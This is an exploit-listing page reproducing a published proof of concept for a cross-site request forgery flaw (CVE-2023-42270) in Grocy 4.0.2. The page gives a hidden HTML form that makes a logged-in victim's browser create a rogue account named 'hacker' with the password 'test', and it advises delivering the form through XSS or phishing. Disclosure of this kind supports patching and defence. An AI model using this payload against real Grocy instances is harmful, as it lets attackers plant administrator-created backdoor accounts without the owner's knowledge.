Grocy 4.0.2 Cross Site Request Forgery

CVE Category Price Severity
CVE-2023-42270 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-02-03

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Grocy 4.0.2 Cross Site Request Forgery
# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage:
# Software Link:
# Tested on: Linux
# CVE : CVE-2023-42270

When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format. 
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.

Proof of Concept
Host the following html code via a XSS or delivery via a phishing campaign:

<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
<input name='username' value='hacker' type='hidden'>
<input name='password' value='test' type='hidden'>
<input type=submit>
history.pushState('','', '/');

If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials

Username: hacker
Password: test

In order for this to work, the target must have Create User Permissions.
This is enabled by default.

Proof of Exploit/Reproduce

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.